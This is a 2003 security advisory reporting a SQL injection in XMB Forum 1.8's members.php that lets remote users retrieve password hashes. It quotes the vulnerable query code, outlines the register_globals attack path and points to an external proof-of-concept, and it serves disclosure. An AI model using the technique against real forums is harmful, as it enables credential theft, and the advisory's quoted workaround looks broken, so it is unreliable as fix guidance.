XMB Forum Input Validation Hole in 'members.php' Lets Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1006622 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 22 2003
|
Impact: Disclosure of system information, Disclosure of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 1.8
|
Description: A vulnerability was reported in XMB Forum (Partagium) message board software. A remote user can obtain hashed user passwords.
Binary Bugs reported that there is a flaw in the registration process that allows a remote user to inject SQL commands to retrieve
password hashes for any XMB Forum user, including the administrator.
If the system is configured with 'register_globals' set
in the 'php.ini' file, a remote user can reportedly submit specially crafted strings in the $email1 and $email2 variables to cause
the 'members.php' to execute certain SQL commands on the database. This can be used to obtain password hashes.
A demonstration
exploit is available at:
http://www.bbugs.org/archiv/exmb.c
|
Impact: A remote user can execute certain SQL commands on the system. This can be used to retrieve password hashes for specific registered users.
|
Solution: The vendor has released a fix (1.8 Final Edition SP1), available at:
http://www.xmbforum.com/download/#partagium
|
Vendor URL: www.xmbforum.com/home/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: <zeez@bbugs.org>
|
Message History:
None.
|
Source Message Contents
|
Date: 22 Apr 2003 17:08:38 -0000
From: <zeez@bbugs.org>
Subject: XMB 1.8 Partagium SQL Injection Bug
|
- Binary Bugs Advisory BB-2003-1 *XMB SQL injection*
-
Product: XMB 1.8 Partagium Final
Vendor: http://www.xmbforum.com
Versions affected: 1.8, possibly others
Impact: SQL injection vulnerability
Risk: Medium/High
Vendor status: Notified/New version available
Release date: April 22, 2003
I. Overview
XMB, the so-called 'Extreme Message Board' is a widely
used forum around
the internet. The vendor proclaims its product to be "the
life behind more
than 3 million boards".
II. Impact
There is a SQL injection bug in the registration
processing.
By specially crafted parameters, a remote attacker is
able to steal
password hashes from any registered user, including the
super administrator.
III. Details
Snippet:
--- members.php ---
if($doublee == "off" && strstr($email, "@")){
$email = trim($email);
$email1 = ", email";
$email2 = "OR email='$email'";
}
$username = trim($username);
$query = $db->query("SELECT username$email1 FROM
$table_members WHERE \
username='$username' $email2");
-------------------
If the webserver running XMB has 'register_globals'
activated in its php.ini,
an attacker is able to modify the SQL query using the
unchecked variables
$email1 and $email2. The stealing of password hashes
can be realized by the
well-known SQL mid() method.
IV. Exploit
A proof-of-concept exploit can be found on
http://www.bbugs.org.
V. Workaround
* Change line 190 to:
$query = $db->query("SELECT username'$email1'
FROM $table_members WHERE \
username='$username' '$email2'");
* Or upgrade to XMB 1.8 Final Edition SP1
VI. Reference
* Origial advisory:
http://www.bbugs.org/advisories/BB-2003-1-XMB
- Binary Bugs
http://www.bbugs.org
|
|
